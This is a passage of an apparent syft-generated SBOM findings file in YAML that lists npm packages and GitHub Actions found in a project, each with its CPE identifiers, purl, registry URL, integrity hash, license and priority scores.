epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9b5805676545e7d1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/node 22.19.17'
title: '@types/node 22.19.17'
description: 'Package discovered: @types/node 22.19.17'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b0b14dd646c615be
name: '@types/node'
version: 22.19.17
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/node:\@types\/node:22.19.17:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/node@22.19.17
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz
integrity: sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==
dependencies:
undici-types: ~6.21.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 08409c71d4ce88d9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/request 2.48.13'
title: '@types/request 2.48.13'
description: 'Package discovered: @types/request 2.48.13'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 656ffeda0aaf4e8b
name: '@types/request'
version: 2.48.13
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/request:\@types\/request:2.48.13:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/request@2.48.13
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz
integrity: sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg==
dependencies:
'@types/caseless': '*'
'@types/node': '*'
'@types/tough-cookie': '*'
form-data: ^2.5.5
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: dd961f2e03e7418d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/tough-cookie 4.0.5'
title: '@types/tough-cookie 4.0.5'
description: 'Package discovered: @types/tough-cookie 4.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cf24fb05ea581070
name: '@types/tough-cookie'
version: 4.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/tough:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/tough:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/tough-cookie@4.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz
integrity: sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7a188cdbd82f20f1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/ws 8.18.1'
title: '@types/ws 8.18.1'
description: 'Package discovered: @types/ws 8.18.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 919683ef9260890b
name: '@types/ws'
version: 8.18.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/ws:\@types\/ws:8.18.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/ws@8.18.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz
integrity: sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==
dependencies:
'@types/node': '*'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 89056081bb223fd4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: abbrev 2.0.0'
title: abbrev 2.0.0
description: 'Package discovered: abbrev 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0277554910df9b38
name: abbrev
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/abbrev@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz
integrity: sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 873a6392b6c08a39
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: abort-controller 3.0.0'
title: abort-controller 3.0.0
description: 'Package discovered: abort-controller 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 02974b3dbbe4d3d6
name: abort-controller
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/abort-controller@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz
integrity: sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==
dependencies:
event-target-shim: ^5.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 661684530a17a73f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: abs-svg-path 0.1.1'
title: abs-svg-path 0.1.1
description: 'Package discovered: abs-svg-path 0.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2eb8f1fab63663a1
name: abs-svg-path
version: 0.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/abs-svg-path@0.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz
integrity: sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 27802507a1dbe242
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: accepts 1.3.8'
title: accepts 1.3.8
description: 'Package discovered: accepts 1.3.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e96668e505272792
name: accepts
version: 1.3.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/accepts@1.3.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz
integrity: sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==
dependencies:
mime-types: ~2.1.34
negotiator: 0.6.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 352cd9201a8ce90d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
startLine: 0
message: 'Package discovered: actions/checkout v2'
title: actions/checkout v2
description: 'Package discovered: actions/checkout v2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b54bfb1da26ce9cd
name: actions/checkout
version: v2
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v2
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3e33aad3d5646f4e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/busboy/.github/workflows/ci.yml
startLine: 0
message: 'Package discovered: actions/checkout v2'
title: actions/checkout v2
description: 'Package discovered: actions/checkout v2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8939931398f7f376
name: actions/checkout
version: v2
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/busboy/.github/workflows/ci.yml
accessPath: /node_modules/busboy/.github/workflows/ci.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v2
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c9bdf9f43faeb29d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/busboy/.github/workflows/lint.yml
startLine: 0
message: 'Package discovered: actions/checkout v2'
title: actions/checkout v2
description: 'Package discovered: actions/checkout v2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9ed4a1365893a541
name: actions/checkout
version: v2
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/busboy/.github/workflows/lint.yml
accessPath: /node_modules/busboy/.github/workflows/lint.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v2
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b70772177f81ea1d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/streamsearch/.github/workflows/ci.yml
startLine: 0
message: 'Package discovered: actions/checkout v2'
title: actions/checkout v2
description: 'Package discovered: actions/checkout v2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bf473f4674a4b4c1
name: actions/checkout
version: v2
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/streamsearch/.github/workflows/ci.yml
accessPath: /node_modules/streamsearch/.github/workflows/ci.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v2
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ec35dedecdc67bae
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/streamsearch/.github/workflows/lint.yml
startLine: 0
message: 'Package discovered: actions/checkout v2'
title: actions/checkout v2
description: 'Package discovered: actions/checkout v2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7ec5891cc205a593
name: actions/checkout
version: v2
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/streamsearch/.github/workflows/lint.yml
accessPath: /node_modules/streamsearch/.github/workflows/lint.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v2
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4424fb771af041f1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/stream-shift/.github/workflows/test.yml
startLine: 0
message: 'Package discovered: actions/checkout v3'
title: actions/checkout v3
description: 'Package discovered: actions/checkout v3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8effbdc22037c585
name: actions/checkout
version: v3
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/stream-shift/.github/workflows/test.yml
accessPath: /node_modules/stream-shift/.github/workflows/test.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v3
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a9754521213a3bbe
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/reusify/.github/workflows/ci.yml
startLine: 0
message: 'Package discovered: actions/checkout v4'
title: actions/checkout v4
description: 'Package discovered: actions/checkout v4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fd10fce47017fa13
name: actions/checkout
version: v4
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/reusify/.github/workflows/ci.yml
accessPath: /node_modules/reusify/.github/workflows/ci.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/checkout@v4
metadataType: github-actions-use-statement
metadata:
value: actions/checkout@v4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d2f68bf6461c8bf2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/busboy/.github/workflows/ci.yml
startLine: 0
message: 'Package discovered: actions/setup-node v1'
title: actions/setup-node v1
description: 'Package discovered: actions/setup-node v1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6b0792dcccc67817
name: actions/setup-node
version: v1
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/busboy/.github/workflows/ci.yml
accessPath: /node_modules/busboy/.github/workflows/ci.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v1
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e6602c50b5a9ed75
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/busboy/.github/workflows/lint.yml
startLine: 0
message: 'Package discovered: actions/setup-node v1'
title: actions/setup-node v1
description: 'Package discovered: actions/setup-node v1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0dc9162b75e9df6b
name: actions/setup-node
version: v1
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/busboy/.github/workflows/lint.yml
accessPath: /node_modules/busboy/.github/workflows/lint.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v1
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 75e343f3c07ad957
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/streamsearch/.github/workflows/ci.yml
startLine: 0
message: 'Package discovered: actions/setup-node v1'
title: actions/setup-node v1
description: 'Package discovered: actions/setup-node v1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 303b3812127b618f
name: actions/setup-node
version: v1
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/streamsearch/.github/workflows/ci.yml
accessPath: /node_modules/streamsearch/.github/workflows/ci.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v1
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f81ee12d2fe7942d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/streamsearch/.github/workflows/lint.yml
startLine: 0
message: 'Package discovered: actions/setup-node v1'
title: actions/setup-node v1
description: 'Package discovered: actions/setup-node v1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5dcd76ce8f7aa30c
name: actions/setup-node
version: v1
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/streamsearch/.github/workflows/lint.yml
accessPath: /node_modules/streamsearch/.github/workflows/lint.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
